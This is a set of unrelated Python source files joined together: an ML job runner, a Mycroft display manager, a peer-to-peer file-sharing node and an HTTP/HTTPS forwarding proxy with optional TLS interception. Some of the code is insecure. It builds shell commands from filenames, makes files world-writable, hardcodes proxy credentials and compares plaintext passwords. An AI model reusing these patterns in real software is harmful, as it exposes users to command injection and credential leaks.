args.num_devices_per_host is not None)
num_hosts, num_devices_per_host = (args.num_hosts,
args.num_devices_per_host)
else:
if hasattr(args, "local") and args.local:
num_hosts = 1
num_devices_per_host = list_gpu_info().count("UUID")
else:
ray.init(address="auto")
num_hosts = len(ray.nodes())
num_devices_per_host = int(
ray.cluster_resources()["GPU"]) // num_hosts
return num_hosts, num_devices_per_host
def write_tsv(heads: Sequence[str],
values: Sequence[Any],
filename: str,
print_line: bool = True):
"""Write tsv data to a file."""
assert len(heads) == len(values)
values = [str(x) for x in values]
with open(filename, "a", encoding="utf-8") as fout:
fout.write("\t".join(values) + "\n")
if print_line:
line = ""
for i in range(len(heads)):
line += heads[i] + ": " + values[i] + " "
print(line)
def to_str_round(x: Any, decimal: int = 6):
"""Print a python object but round all floating point numbers."""
if isinstance(x, str):
return x
if isinstance(x, (list, tuple, np.ndarray)):
tmp_str = ", ".join([to_str_round(y, decimal=decimal) for y in x])
return "[" + tmp_str + "]"
if isinstance(x, dict):
return str({k: to_str_round(v, decimal=decimal) for k, v in x.items()})
if isinstance(x, int):
return str(x)
if isinstance(x, float):
format_str = f"%.{decimal}f"
return format_str % x
if x is None:
return str(x)
raise ValueError("Invalid value: " + str(x))
_tic = None
def print_used_time(message: str):
"""Print a message and the elapsed time from the last call."""
global _tic
if message:
print(f" - {message}: {time.time() - _tic:.2f} s")
_tic = time.time()
########################################
##### Other Utilities
########################################
GB = 1 << 30 # Gigabyte
MB = 1 << 20 # Megabyte
def map_to_shape(array_pytree: PyTreeDef):
"""Map a PyTree of jax arrays to their shapes."""
return tree_map(lambda x: getattr(x, "shape", None), array_pytree)
def compute_bytes(pytree: PyTreeDef):
"""Compute the total bytes of arrays in a pytree."""
flatten_args, _ = tree_flatten(pytree)
ret = 0
for x in flatten_args:
if hasattr(x, "shape"):
ret += np.prod(x.shape) * x.dtype.itemsize
return ret
def compute_param_number(pytree: PyTreeDef):
"""Compute the total number of elements in a pytree."""
flatten_args, _ = tree_flatten(pytree)
ret = 0
for x in flatten_args:
if hasattr(x, "shape"):
ret += np.prod(x.shape)
return ret
_DISABLE_NUMBA = False
def maybe_numba_jit(func):
"""Decorator to mark a function as numba jitted if numba is available."""
try:
from numba import jit # pylint: disable=import-outside-toplevel
jitted_func = jit(nopython=True)(func)
def wrapper(*args, **kwargs):
if _DISABLE_NUMBA:
return func(*args, **kwargs)
return jitted_func(*args, **kwargs)
return wrapper
except ImportError:
logger.warning("Install numba to jit and accelerate the function.")
return func
def is_ray_node_resource(resource_key):
"""Check if the current resource is the host ip."""
ishost_regex = re.compile(r"^node:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$")
return ishost_regex.match(resource_key)
|
main.py | import multiprocessing
from mlapp.env_loader import EnvironmentLoader
from mlapp.utils.general import read_json_file
import importlib
import uuid
import json
from mlapp.handlers.wrappers.database_wrapper import database_instance
from mlapp.handlers.wrappers.file_storage_wrapper import file_storage_instance
from mlapp.handlers.wrappers.message_queue_wrapper import message_queue_instance
from mlapp.handlers.wrappers.spark_wrapper import spark_instance
from mlapp.managers.flow_manager import FlowManager
import traceback
from ast import literal_eval
from mlapp.config import settings, environment_services
import os
class MLApp(object):
MLAPP_SERVICE_TYPE = '_MLAPP_SERVICE_TYPE'
def __init__(self, inner_settings=None):
"""
Constructor for the MLApp Class.
This class, when becomes instantiated is the main endpoint for the ML App Library.
To this constructor you pass in your custom settings, which sets up your customized configuration of ML App,
and Environment that you defined with the ML App CLI.
After the instantiation you can use the instance to run:
- Flows (single-process and multi-process)
- Applications/Workers (using the queue listener)
- Send configurations to an outside queue
"""
if inner_settings is None:
inner_settings = {}
for key in inner_settings:
if isinstance(inner_settings[key], dict):
if key not in settings:
settings[key] = {}
settings[key].update(inner_settings[key])
elif isinstance(inner_settings[key], list):
if key not in settings:
settings[key] = []
settings[key] += inner_settings[key]
else:
settings[key] = inner_settings[key]
# init environment services
env = EnvironmentLoader.load(filename=inner_settings.get('env_file_path', ''))
env_services_dict = {
k.replace(self.MLAPP_SERVICE_TYPE, ''): os.environ[k].lower()
for k in os.environ if k.endswith(self.MLAPP_SERVICE_TYPE)
}
settings['services'] = EnvironmentLoader.create_services(env, env_services_dict, environment_services)
for wrapper_instance in [file_storage_instance, database_instance, message_queue_instance, spark_instance]:
wrapper_instance.init()
# ======== TASK RUN ==========
def _on_callback(self, message_body):
"""
This is the function that executes the configuration sent to the application/worker.
:param message_body: the configuration in bytes/string format.
:return: None
"""
job_id = 'None'
try:
message_body = message_body.decode("utf-8")
except AttributeError as attrError:
pass # message body is string and not bytes
print("Hello, The following task is consumed: " + str(message_body))
try:
message_config = json.loads(literal_eval(message_body))
except Exception as first_error:
try:
message_config = json.loads(message_body)
except Exception as second_error:
print("Error response: " + str('Message not in JSON format'))
traceback.print_exc()
self._send_error_response_to_mq(job_id, '-1', str('Message not in JSON format'))
return
print(message_config)
try:
job_id = str(message_config.get('job_id', str(uuid.uuid4())))
results = self._run_flow(job_id, message_config)
self._send_ok_response_to_mq(
job_id, results.get('status_code', -1), 'all went ok', results.get('response', {}))
except Exception as error:
print("Error response: " + str(error))
traceback.print_exc()
self._send_error_response_to_mq(job_id, '-1', str(error))
finally:
pass
# =========== TASK HANDLERS ===========
def _run_flow(self, job_id, config):
"""
This is the function that executes the Flow of your configuration.
:param job_id: the job identifier used for monitoring via the Control Panel.
:param config: the configuration as Dictionary.
:return: Dictionary containing the status and response of the flow run.
"""
# update job
database_instance.update_job_running(job_id)
# call Flow_manager to run the job
status_code, response, _ = FlowManager(job_id, config).run()
return {'status_code': status_code, 'response': response}
# ======== MQ HANDLERS =========
def _send_ok_response_to_mq(self, job_id, status_code, status_msg, result):
"""
This function sends response back to the Control Panel via queue if the job succeeded
:param job_id: the job identifier used for monitoring via the Control Panel.
:param status_code: result status of the flow run.
:param status_msg: result message of the flow run.
:param result: response of the flow run - if json serialized returned in the message queue as well.
:return: None
"""
response_obj = {
"job_id": job_id, "status_code": status_code, "status_msg": status_msg
}
try:
# trying to JSON-ify result object
response_obj['result'] = result
response_json = json.dumps(response_obj)
except Exception as error:
print(error)
response_obj['result'] = {}
response_json = json.dumps(response_obj)
message_queue_instance.send_message(settings['queues']['send_queue_name'], response_json)
def _send_error_response_to_mq(self, job_id, status_code, status_msg):
"""
This function sends response back to the Control Panel via queue if the job failed
:param job_id: the job identifier used for monitoring via the Control Panel.
:param status_code: error status of the flow run.
:param status_msg: error message of the flow run.
:return: None
"""
response_json = json.dumps({"job_id": job_id, "status_code": status_code, "status_msg": status_msg})
message_queue_instance.send_message(settings['queues']['send_queue_name'], response_json)
def _dispatch_jobs_to_mq(self, configurations):
"""
This function sends configurations to the queue to be picked up later by a listening Application/Worker.
:param configurations: list of configurations to be sent
:return: None
"""
for configuration in configurations:
response_json = json.dumps(configuration)
message_queue_instance.send_message(settings['queues']['send_queue_name'], json.dumps(response_json))
# ======== LISTENER =========
def run_listener(self):
"""
This function is an endpoint of the ML App Library to be used in an Application/Worker.
It sets up a listening queue indefinitely waiting for configuration to process upon receive.
"""
message_queue_instance.listen_to_queues(settings['queues']['listen_queue_names'], self._on_callback)
# ======== RUN CONFIG =========
def run_flow(self, asset_name, config_path, config_name=None, **kwargs):
"""
This function is an endpoint of the ML App Library to be used in a local environment.
It runs a local configuration file in your local computer.
:param asset_name: name of the asset to be run
:param config_path: path to configuration file
:param config_name: in case configuration file is python looks for variable in this name as the configuration
:return: List containing the outputs defined in configuration file
"""
job_id = str(uuid.uuid4())
try:
config = read_json_file(config_path)
except Exception as err:
config = self._read_py_file(asset_name, config_path, config_name)
self._insert_latest_id_in_config(config)
_, run_ids, outputs = FlowManager(job_id, config, **kwargs).run()
self._update_latest_model_id(config, run_ids)
return outputs
@staticmethod
def run_flow_from_config(config):
return FlowManager("deployment", config).run()
# ======== SEND CONFIG TO MQ =========
def run_msg_sender(self, asset_name, config_path, config_name=None):
"""
This function is an endpoint of the ML App Library to be used in a local environment.
It sends a local configuration file in your local computer to be run in an outside Application/Worker via
message queue.
:param asset_name: name of the asset to be run
:param config_path: path to configuration file
:param config_name: in case configuration file is python looks for variable in this name as the configuration
"""
try:
message_to_send = read_json_file(config_path)
except Exception as e:
message_to_send = self._read_py_file(asset_name, config_path, config_name)
job_id = str(uuid.uuid4())
message_to_send['job_id'] = job_id
message_queue_instance.send_message(settings['queues']['listen_queue_names'][0], json.dumps(message_to_send))
print("Message Sent (job_id: " + job_id + "): ", asset_name, config_path)
# ======== RUN CONFIGS MULTIPROCESSING =========
def run_configs_multiprocessing(self, instructions):
"""
This function is an endpoint of the ML App Library.
It runs multiple configurations in multi-processing.
:param instructions: list of instruction to send to each process
"""
jobs = []
for instruction in instructions:
p = multiprocessing.Process(target=self._run_config_multiprocess, args=(instruction,))
jobs.append(p)
p.start()
for p in jobs:
p.join()
# ======== HELPER PRIVATE FUNCTIONS =========
def _run_config_multiprocess(self, instruction):
"""
This function is executes instruction of a process when used by `run_configs_multiprocessing`.
:param instruction: instruction Dictionary containing asset_name, config_path and config_name.
- asset_name: name of the asset to be run
- config_path path to configuration file
- config_name in case configuration file is python looks for variable in this name as the configuration
"""
try:
self.run_flow(instruction['asset_name'], instruction['config_path'], instruction.get('config_name'))
except Exception as err:
print(err)
traceback.print_exc()
@staticmethod
def _read_py_file(asset_name, config_path, config_name):
"""
This function fetches a configuration Dictionary stored in a python file.
:param asset_name: name of the asset to be run
:param config_path: path to configuration file
:param config_name: variable in the python file containing the configuration
:return: Configuration as a Dictionary
"""
spec = importlib.util.spec_from_file_location(asset_name, config_path)
config = importlib.util.module_from_spec(spec)
spec.loader.exec_module(config)
return config.__dict__[config_name]
@staticmethod
def _insert_latest_id_in_config(config):
"""
This is a helper function for using `latest` feature in local environment.
Updates current configuration to be run with the latest id stored in a local file containing it
by reference of asset name.
:param config: current flow run configuration as a Dictionary
"""
# prepare latest file
local_path = settings.get('local_storage_path', 'output')
latest_file_name = settings.get('latest_file_name', 'latest_ids.json')
latest_ids_path = os.path.join(local_path, latest_file_name)
try:
with open(latest_ids_path) as f:
latest = json.load(f)
except:
latest = {}
# iterate pipelines
for i, pipeline in enumerate(config.get('pipelines_configs', [])):
# iterate optional ids
for id_type in ['model_id', 'data_id', 'reuse_features_id']:
# check if requested latest
if pipeline.get('job_settings', {}).get(id_type, None) == 'latest':
# get current asset name
asset_name = pipeline['job_settings']['asset_name']
# check if available id
if asset_name in latest:
# TODO: add here asset label level
# TODO: add here data_id/model_id/reuse_features_id
config['pipelines_configs'][i]['job_settings'][id_type] = latest[asset_name]
else:
# raise exception as not found id
raise Exception("Could not find latest `" + id_type + "` for `" + asset_name + "`. \n"
"Please update your config with a valid `" + id_type + "`")
@staticmethod
def _update_latest_model_id(config, run_ids):
"""
This is a helper function for using `latest` feature in local environment.
Updates local file containing the latest id used for an asset.
:param config: current flow run configuration as a Dictionary
:params run_ids: list of mlapp identifiers generated in the current flow run.
"""
# prepare latest file
local_path = settings.get('local_storage_path', 'output')
latest_file_name = settings.get('latest_file_name', 'latest_ids.json')
if not os.path.exists(local_path):
os.makedirs(local_path)
latest_ids_path = os.path.join(local_path, latest_file_name)
latest = {}
try:
with open(latest_ids_path) as f:
latest = json.load(f)
except:
pass
# iterate over pipelines
for pipeline, run_id in zip(config['pipelines_configs'], run_ids):
# check if ran any pipeline where id is being stored
# TODO: add here asset label level
# TODO: add here data_id/model_id/reuse_features_id
if pipeline['job_settings']['pipeline'] in ['train', 'feature_engineering']:
latest[pipeline['job_settings']['asset_name']] = run_id
with open(latest_ids_path, 'w') as f:
json.dump(latest, f)
|
display_manager.py | # Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from threading import Thread, Timer
import os
from mycroft.messagebus.client.ws import WebsocketClient
from mycroft.util import get_ipc_directory
from mycroft.util.log import LOG
def _write_data(dictionary):
"""Writes the parama as JSON to the
IPC dir (/tmp/mycroft/ipc/managers)
args:
dict: dictionary
"""
managerIPCDir = os.path.join(get_ipc_directory(), "managers")
# change read/write permissions based on if file exists or not
path = os.path.join(managerIPCDir, "disp_info")
permission = "r+" if os.path.isfile(path) else "w+"
if permission == "w+" and os.path.isdir(managerIPCDir) is False:
os.makedirs(managerIPCDir)
os.chmod(managerIPCDir, 0777)
try:
with open(path, permission) as dispFile:
# check if file is empty
if os.stat(str(dispFile.name)).st_size != 0:
data = json.load(dispFile)
else:
data = {}
LOG.info("Display Manager is creating " + dispFile.name)
for key in dictionary:
data[key] = dictionary[key]
dispFile.seek(0)
dispFile.write(json.dumps(data))
dispFile.truncate()
os.chmod(path, 0777)
except Exception as e:
LOG.error(e)
LOG.error("Error found in display manager file, deleting...")
os.remove(path)
_write_data(dictionary)
def _read_data():
""" Reads the file in (/tmp/mycroft/ipc/managers/disp_info)
and returns the the data as python dict
"""
managerIPCDir = os.path.join(get_ipc_directory(), "managers")
path = os.path.join(managerIPCDir, "disp_info")
permission = "r" if os.path.isfile(path) else "w+"
if permission == "w+" and os.path.isdir(managerIPCDir) is False:
os.makedirs(managerIPCDir)
data = {}
try:
with open(path, permission) as dispFile:
if os.stat(str(dispFile.name)).st_size != 0:
data = json.load(dispFile)
except Exception as e:
LOG.error(e)
os.remove(path)
_read_data()
return data
def set_active(skill_name):
""" Sets skill name as active in the display Manager
args:
string: skill_name
"""
_write_data({"active_skill": skill_name})
def get_active():
""" Get active skill in the display manager
"""
data = _read_data()
active_skill = ""
if "active_skill" in data:
active_skill = data["active_skill"]
return active_skill
def remove_active():
""" Remove the active skill in the skill manager
"""
LOG.debug("Removing active skill...")
_write_data({"active_skill": ""})
def initiate_display_manager_ws():
""" Initiates the web sockets on the display_manager
"""
LOG.info("Initiating display manager websocket")
# Should remove needs to be an object so it can be referenced in functions
# [https://stackoverflow.com/questions/986006/how-do-i-pass-a-variable-by-reference]
should_remove = [True]
def check_flag(flag):
if flag[0] is True:
remove_active()
def set_delay(event=None):
should_remove[0] = True
Timer(2, check_flag, [should_remove]).start()
def set_remove_flag(event=None):
should_remove[0] = False
def connect():
ws.run_forever()
def remove_wake_word():
data = _read_data()
if "active_skill" in data and data["active_skill"] == "wakeword":
remove_active()
def set_wakeword_skill(event=None):
set_active("wakeword")
Timer(10, remove_wake_word).start()
ws = WebsocketClient()
ws.on('recognizer_loop:audio_output_end', set_delay)
ws.on('recognizer_loop:audio_output_start', set_remove_flag)
ws.on('recognizer_loop:record_begin', set_wakeword_skill)
event_thread = Thread(target=connect)
event_thread.setDaemon(True)
event_thread.start()
|
node.py | from threading import Thread
import client as cl
import storage
import socket
import utils
import json
import time
import os
class Node:
inbound = 2424
def __init__(self, peers):
self.pool = peers
self.actions = {'AddPeer': self.add_peer,
'HashVal': self.hashdump,
'Uptime': self.uptime}
self.memory = self.check_memory()
self.hostname = os.getlogin()
self.os = os.name
self.uptime = 0.0
self.running = True
# get file hashes of shares
self.shares = self.setup_shares()
serve = Thread(target=self.run_backend, args=())
serve.setDaemon(True)
serve.start()
def check_memory(self):
free_mem = utils.cmd('free --kilo',False)
mem_labels = free_mem[0]
mem_labels = list(filter(None,mem_labels.split(' ')))
mem_free = list(filter(None,free_mem[1].split(' ')))
mem_free.pop(0)
memory_data = {}
i = 0
for label in mem_labels:
memory_data[label] = mem_free[i]
i += 1
return memory_data
def set_uptime(self,new_dt):
self.uptime = new_dt
def setup_shares(self):
hashes = {}
if not os.path.isdir('.shares/'):
os.mkdir('.shares')
if not os.path.isdir('received'):
os.mkdir('received')
else:
# os.system('mv received/* .shares/')
for f in os.listdir('received/'):
fn = '%s/received/%s' % (os.getcwd(), f)
fhash = utils.cmd('sha256sum %s' % fn,False).pop().split(' ')[0]
hashes[fn] = fhash
for fl in os.listdir('.shares'):
fn = '%s/.shares/%s' % (os.getcwd(), fl)
fhash = utils.cmd('sha256sum %s' % fn,False).pop().split(' ')[0]
hashes[fn] = fhash
return hashes
def update_shares(self):
self.shares = self.setup_shares()
print('[-] %d shared files ' % len(self.shares.keys()))
def run_backend(self):
print('[-] Backend Server Listening on 0.0.0.0:%d'%self.inbound)
s = utils.create_listener(self.inbound)
iteration = 0
try:
while self.running:
try:
c, i = s.accept()
c = self.handler(c,i)
c.close()
# update shares
self.shares = self.setup_shares()
# check if peers have the same shares
except socket.error:
print('[!!] Connection error with %s')
pass
iteration += 1
except KeyboardInterrupt:
self.running = False
pass
def add_peer(self, sock, args):
addr = args[0]
if addr not in self.pool:
self.pool.append(addr)
print('[+] Added peer %s' % addr)
sock.send(b'[+] Peer Added')
else:
sock.send(b'[x] Peer is known')
return sock
def uptime(self, sock, args):
dt = time.time() - self.start
ut = '[-] Uptime: %d seconds' % dt
sock.send(ut.encode('utf-8'))
self.set_uptime(dt)
return sock
def hashdump(self, sock, args):
hdata = json.dumps(self.shares).encode('utf-8')
sock.send(b'%s' % hdata)
return sock
def distribute_shared_files(self):
for peer in self.pool:
# Get files from this peer
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((peer, 2424))
s.send(b'HashVal :::: null')
try:
rmt_files = json.loads(s.recv(2048))
except ValueError:
rmt_files = {}
pass
for rf in rmt_files:
rhash = rmt_files[rf]
if rhash not in self.shares.values():
print('[o] %s has a file I dont [%s]'%(peer,rf))
for file in self.shares.keys():
recipient = storage.distribute(file, self.pool)
cl.send_file(file, recipient, 4242)
s.close()
def handler(self, c, i):
request = c.recv(1024).decode('utf-8')
try:
api_req = request.split(' :::: ')[0]
params = request.split(' :::: ')[1].split(',')
if api_req in self.actions.keys():
c = self.actions[api_req](c, params)
except IndexError:
pass
return c |
proxy2.py | # -*- coding: utf-8 -*-
import sys
import os
import socket
import ssl
import select
import httplib
import base64
import urlparse
import threading
import gzip
import zlib
import time
import json
import re
import traceback
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
from cStringIO import StringIO
from subprocess import Popen, PIPE
from HTMLParser import HTMLParser
from multiprocessing import Process
import multiprocessing
import database
from database import User
route_table = {
20000: 'ca.smartproxy.com:20000:rycao18:Unknown',
20001: 'us.smartproxy.com:10000:rycao18:Unknown',
20002: 'ca.smartproxy.com:20000:rycao18:Unknown',
20003: 'us.smartproxy.com:10000:rycao18:Unknown',
20004: 'ca.smartproxy.com:20000:rycao18:Unknown',
20005: 'us.smartproxy.com:10000:rycao18:Unknown',
20006: 'ca.smartproxy.com:20000:rycao18:Unknown',
20007: 'us.smartproxy.com:10000:rycao18:Unknown',
20008: 'ca.smartproxy.com:20000:rycao18:Unknown',
20009: 'us.smartproxy.com:10000:rycao18:Unknown',
20010: 'ca.smartproxy.com:20000:rycao18:Unknown',
20011: 'us.smartproxy.com:10000:rycao18:Unknown',
20012: "proxy.spider.com:8080:berkeley-Unknown-country-us:Rycaorec"
}
mysession = {
'table': route_table,
'test': 'test'
}
def with_color(c, s):
return "\x1b[%dm%s\x1b[0m" % (c, s)
def join_with_script_dir(path):
return os.path.join(os.path.dirname(os.path.abspath(__file__)), path)
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
address_family = socket.AF_INET
daemon_threads = True
def handle_error(self, request, client_address):
# surpress socket/ssl related errors
cls, e = sys.exc_info()[:2]
if cls is socket.error or cls is ssl.SSLError:
pass
else:
return HTTPServer.handle_error(self, request, client_address)
class ProxyRequestHandler(BaseHTTPRequestHandler):
cakey = join_with_script_dir('ca.key')
cacert = join_with_script_dir('ca.crt')
# cakey = join_with_script_dir('privkey.pem')
# cacert = join_with_script_dir('fullchain.pem')
certkey = join_with_script_dir('cert.key')
certdir = join_with_script_dir('certs/')
timeout = 30
lock = threading.Lock()
process_lock = None
ScopedSession = None
proxy_ip, proxy_port, proxy_username, proxy_password = ('', '', '', '')
def __init__(self, *args, **kwargs):
self.tls = threading.local()
self.tls.conns = {}
self.username = None
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
# self.proxy_host = "ca.smartproxy.com"
# self.proxy_port = 20000
# self.proxy_username = 'rycao18'
# self.proxy_password = 'Unknown'
def log_error(self, format, *args):
# surpress "Request timed out: timeout('timed out',)"
if isinstance(args[0], socket.timeout):
return
self.log_message(format, *args)
def do_AUTHHEAD(self):
print("send header")
self.send_response(407)
self.send_header('Proxy-Authenticate', 'Basic realm=\"Test\"')
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_Authentication(self, auth_header, session):
print(auth_header)
self.user = None
auth_values = auth_header.split(' ')
if auth_values[0] != 'Basic':
return False
auth_key = auth_values[1]
username, pwd = base64.decodestring(auth_key).split(':')
user = session.query(User).filter(User.username == username, User.password == pwd).first()
print(user)
self.user = user
if user is None:
return False
return True
def init_ProxyInfo(self):
port_number = self.server.server_port
proxy_parts = route_table[port_number].split(':')
print(proxy_parts)
self.proxy_ip = str(proxy_parts[0])
self.proxy_port = int(proxy_parts[1])
self.proxy_username = str(proxy_parts[2])
self.proxy_password = str(proxy_parts[3])
def do_CONNECT(self):
self.init_ProxyInfo()
print("DO CONNECT Proxy Authorization Headers ", self.headers.getheader('Proxy-Authorization'))
session = self.ScopedSession()
if self.headers.getheader('Proxy-Authorization') is None:
self.do_AUTHHEAD()
self.wfile.write('no auth header received')
self.wfile.write('\r\n\r\n')
self.wfile.flush()
return
elif not self.do_Authentication(self.headers.getheader('Proxy-Authorization'), session):
self.do_AUTHHEAD()
self.wfile.write(self.headers.getheader('Proxy-Authorization'))
self.wfile.write('Not Authenticated')
self.wfile.write('\r\n\r\n')
self.wfile.flush()
self.ScopedSession.remove()
return
# self.ScopedSession.remove()
if os.path.isfile(self.cakey) and os.path.isfile(self.cacert) and os.path.isfile(self.certkey) and os.path.isdir(self.certdir):
self.connect_intercept()
else:
self.connect_relay()
def connect_intercept(self):
hostname = self.path.split(':')[0]
certpath = "%s/%s.crt" % (self.certdir.rstrip('/'), hostname)
# with self.lock:
# if not os.path.isfile(certpath):
# epoch = "%d" % (time.time() * 1000)
# p1 = Popen(["openssl", "req", "-new", "-key", self.certkey, "-subj", "/CN=%s" % hostname], stdout=PIPE)
# p2 = Popen(["openssl", "x509", "-req", "-days", "3650", "-CA", self.cacert, "-CAkey", self.cakey, "-set_serial", epoch, "-out", certpath], stdin=p1.stdout, stderr=PIPE)
# p2.communicate()
self.wfile.write("%s %d %s\r\n" % (self.protocol_version, 200, 'Connection Established'))
self.end_headers()
# self.connection = ssl.wrap_socket(self.connection, keyfile=self.certkey, certfile=certpath, server_side=True)
self.connection = ssl.wrap_socket(self.connection, keyfile=self.cakey, certfile=self.cacert, server_side=True)
self.rfile = self.connection.makefile("rb", self.rbufsize)
self.wfile = self.connection.makefile("wb", self.wbufsize)
conntype = self.headers.get('Proxy-Connection', '')
if self.protocol_version == "HTTP/1.1" and conntype.lower() != 'close':
self.close_connection = 0
else:
self.close_connection = 1
def connect_relay(self):
session = self.ScopedSession()
address = self.path.split(':', 1)
address[1] = int(address[1]) or 443
auth = '%s:%s' % (self.proxy_username, self.proxy_password)
self.headers['Proxy-Authorization'] = 'Basic ' + base64.b64encode(auth)
raw_data = self.raw_requestline + str(self.headers) + "\r\n"
print(raw_data)
try:
address = (self.proxy_ip,self.proxy_port)
s = socket.create_connection(address, timeout=self.timeout)
s.sendall(raw_data)
result = s.recv(8192)
self.connection.sendall(result)
except Exception as e:
self.send_error(502)
return
# self.send_response(200, 'Connection Established')
# self.end_headers()
conns = [self.connection, s]
self.close_connection = 0
streamed_bytes = 0
while not self.close_connection:
rlist, wlist, xlist = select.select(conns, [], conns, self.timeout)
if xlist or not rlist:
break
for r in rlist:
other = conns[1] if r is conns[0] else conns[0]
data = r.recv(8192)
streamed_bytes += len(data)
if not data:
self.close_connection = 1
break
other.sendall(data)
with self.lock:
if self.user:
print("=final")
print(streamed_bytes)
session.query(User).filter(User.username == self.user.username).update(
{User.data_usage: User.data_usage + streamed_bytes})
session.commit()
self.ScopedSession.remove()
def end_handle_request(self):
self.close_connection = 1
self.ScopedSession.remove()
def do_GET(self):
self.init_ProxyInfo()
print("========= Do Get Authorization Headers ============", self.headers.getheader('Proxy-Authorization'))
print(self.path)
if self.path == 'http://proxy2.test/':
self.send_cacert()
return
print(self.ScopedSession)
session = self.ScopedSession()
if not isinstance(self.connection, ssl.SSLSocket):
# Proxy Authentication Part
if self.headers.getheader('Proxy-Authorization') is None:
self.do_AUTHHEAD()
self.wfile.write('no auth header received')
self.wfile.flush()
self.end_handle_request()
return
elif not self.do_Authentication(self.headers.getheader('Proxy-Authorization'), session):
self.do_AUTHHEAD()
self.wfile.write(self.headers.getheader('Proxy-Authorization'))
self.wfile.write('Not Authenticated')
self.wfile.flush()
self.end_handle_request()
return
req = self
content_length = int(req.headers.get('Content-Length', 0))
req_body = self.rfile.read(content_length) if content_length else None
if req.path[0] == '/':
if isinstance(self.connection, ssl.SSLSocket):
req.path = "https://%s%s" % (req.headers['Host'], req.path)
else:
req.path = "http://%s%s" % (req.headers['Host'], req.path)
req_body_modified = self.request_handler(req, req_body)
if req_body_modified is False:
self.send_error(403)
self.end_handle_request()
return
elif req_body_modified is not None:
req_body = req_body_modified
req.headers['Content-length'] = str(len(req_body))
u = urlparse.urlsplit(req.path)
scheme, netloc, path = u.scheme, u.netloc, (u.path + '?' + u.query if u.query else u.path)
assert scheme in ('http', 'https')
if netloc:
req.headers['Host'] = netloc
setattr(req, 'headers', self.filter_headers(req.headers))
try:
origin = (scheme, netloc)
auth = '%s:%s' % (self.proxy_username, self.proxy_password)
req.headers['Proxy-Authorization'] = 'Basic ' + base64.b64encode(auth)
if not origin in self.tls.conns:
if scheme == 'https':
self.tls.conns[origin] = httplib.HTTPSConnection(self.proxy_ip, self.proxy_port, timeout=self.timeout)
self.tls.conns[origin].set_tunnel(netloc, headers={'Proxy-Authorization': req.headers['Proxy-Authorization']})
# self.tls.conns[origin] = httplib.HTTPSConnection(netloc, timeout=self.timeout)
else:
self.tls.conns[origin] = httplib.HTTPConnection(self.proxy_ip, self.proxy_port, timeout=self.timeout)
# self.tls.conns[origin].set_tunnel(netloc,headers={'Proxy-Authorization':req.headers['Proxy-Authorization']});
# self.tls.conns[origin] = httplib.HTTPConnection(netloc, timeout=self.timeout)
conn = self.tls.conns[origin]
if scheme == 'https':
conn.request(self.command, path, req_body, dict(req.headers))
else:
conn.request(self.command, req.path, req_body, dict(req.headers))
res = conn.getresponse()
version_table = {10: 'HTTP/1.0', 11: 'HTTP/1.1'}
setattr(res, 'headers', res.msg)
setattr(res, 'response_version', version_table[res.version])
# support streaming
if not 'Content-Length' in res.headers and 'no-store' in res.headers.get('Cache-Control', ''):
self.response_handler(req, req_body, res, '')
setattr(res, 'headers', self.filter_headers(res.headers))
streamed_bytes = self.relay_streaming(res)
with self.lock:
if self.user:
self.user.data_usage = self.user.data_usage + streamed_bytes
session.commit()
self.save_handler(req, req_body, res, '')
self.end_handle_request()
return
res_body = res.read()
except Exception as e:
if origin in self.tls.conns:
del self.tls.conns[origin]
self.send_error(502)
# self.close_connection = 1
traceback.print_exc()
self.end_handle_request()
return
content_encoding = res.headers.get('Content-Encoding', 'identity')
res_body_plain = self.decode_content_body(res_body, content_encoding)
res_body_modified = self.response_handler(req, req_body, res, res_body_plain)
if res_body_modified is False:
self.send_error(403)
# self.close_connection = 1
self.end_handle_request()
return
elif res_body_modified is not None:
res_body_plain = res_body_modified
res_body = self.encode_content_body(res_body_plain, content_encoding)
res.headers['Content-Length'] = str(len(res_body))
setattr(res, 'headers', self.filter_headers(res.headers))
self.wfile.write("%s %d %s\r\n" % (self.protocol_version, res.status, res.reason))
for line in res.headers.headers:
self.wfile.write(line)
self.end_headers()
self.wfile.write(res_body)
self.wfile.flush()
with self.lock:
# print("=============user===========")
# print(self.user)
# print(len(res_body))
if self.user:
# print("===== add the data usage data")
# print(self.user.data_usage)
session.query(User).filter(User.username == self.user.username).update(
{User.data_usage: User.data_usage + len(res_body)})
# self.user.data_usage = self.user.data_usage + len(res_body)
# print(self.user.data_usage)
session.commit()
self.save_handler(req, req_body, res, res_body_plain)
print("===========Do Get End Response==========")
self.end_handle_request()
def relay_streaming(self, res):
streamed_bytes = 0
self.wfile.write("%s %d %s\r\n" % (self.protocol_version, res.status, res.reason))
for line in res.headers.headers:
self.wfile.write(line)
self.end_headers()
try:
while True:
chunk = res.read(8192)
if not chunk:
break
streamed_bytes = streamed_bytes + len(chunk)
self.wfile.write(chunk)
self.wfile.flush()
except socket.error:
# connection closed by client
pass
return streamed_bytes
do_HEAD = do_GET
do_POST = do_GET
do_PUT = do_GET
do_DELETE = do_GET
do_OPTIONS = do_GET
def filter_headers(self, headers):
# http://tools.ietf.org/html/rfc2616#section-13.5.1
hop_by_hop = ('connection', 'keep-alive', 'proxy-authenticate',
'proxy-authorization', 'te', 'trailers', 'transfer-encoding', 'upgrade')
for k in hop_by_hop:
del headers[k]
# accept only supported encodings
if 'Accept-Encoding' in headers:
ae = headers['Accept-Encoding']
filtered_encodings = [x for x in re.split(r',\s*', ae) if x in ('identity', 'gzip', 'x-gzip', 'deflate')]
headers['Accept-Encoding'] = ', '.join(filtered_encodings)
return headers
def encode_content_body(self, text, encoding):
if encoding == 'identity':
data = text
elif encoding in ('gzip', 'x-gzip'):
io = StringIO()
with gzip.GzipFile(fileobj=io, mode='wb') as f:
f.write(text)
data = io.getvalue()
elif encoding == 'deflate':
data = zlib.compress(text)
else:
raise Exception("Unknown Content-Encoding: %s" % encoding)
return data
